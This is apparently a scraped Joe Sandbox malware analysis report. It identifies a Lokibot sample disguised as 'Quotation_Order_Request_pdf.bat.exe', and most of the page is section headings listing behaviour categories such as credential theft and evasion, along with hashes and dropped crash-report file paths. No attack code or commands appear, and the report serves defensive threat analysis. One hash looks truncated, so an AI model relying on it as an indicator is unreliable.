SHA1:	AEC9F404A0C29B0E6E02EFDB2A65292EDC3F1F3D
SHA-256:	60E668DC95710CB21189AFA9F71E9230EC0775A2D2F40E1E3FDEFD

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Quotation_Order_Request_pdf.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bCirqu.exe_55e4b8d467f93888e659593fd52e85967a9f4_23a869ac_8d3a3b2c-ecdd-42ec-b216-33e253e49864\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9EB9.tmp.dmp

Windows Analysis Report
Quotation_Order_Request_pdf.bat.exe